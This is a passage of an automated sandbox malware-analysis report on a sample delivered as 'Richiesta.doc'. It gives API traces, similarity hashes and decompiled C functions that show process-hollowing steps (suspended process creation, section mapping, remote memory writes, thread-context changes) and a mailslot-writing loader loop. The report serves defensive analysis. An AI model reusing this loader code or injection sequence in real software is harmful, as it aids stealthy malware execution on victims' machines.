				ExitThread(_t3);
			}


APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 162
  • API ID: CreateProcessGetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 1501718689-2746444292
  • Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
  • Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
  • Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
  • Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
APIs
  • memset.NTDLL ref: 002E13B5
    • Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354
  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
  • GetLastError.KERNEL32(00000001), ref: 002E1422
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E1433
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:AD22F7E25E6FCCF900B5060D4C5E9532
Total matches:32
Initial Analysis Report:Open
Initial sample Analysis ID:68439
Initial sample SHA 256:78E57715D0C6C12E90E96D82B3FF839B78C421F5EFF663AAB6D19DA5B6D82200
Initial sample name:Richiesta.doc

Similar Executed Functions

Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}


APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

Per-line instruction addresses (the report's address column beside the code above, in its original order; 0x00000000 marks a line without a code address): 0x004010fb, 0x004010fb, 0x00401104, 0x00401107, 0x00401118, 0x00401121, 0x00401124, 0x00401139, 0x00401126, 0x0040112e, 0x00401131, 0x00401131, 0x0040113c, 0x00401145, 0x004011ea, 0x004011ef, 0x004011ef, 0x00401158, 0x0040115f, 0x004011da, 0x004011e1, 0x004011e4, 0x00000000, 0x004011e4, 0x00401161, 0x00401164, 0x00401165, 0x00401168, 0x0040116e, 0x00401170, 0x00401173, 0x00401175, 0x00401175, 0x0040118a, 0x00401192, 0x004011a8, 0x004011b1, 0x004011b4, 0x00000000, 0x00000000, 0x00401194, 0x00401194, 0x00401197, 0x0040119a, 0x0040119c, 0x004011a2, 0x004011a3, 0x004011a3, 0x0040119c, 0x004011b8, 0x004011be, 0x004011c8, 0x004011d1, 0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
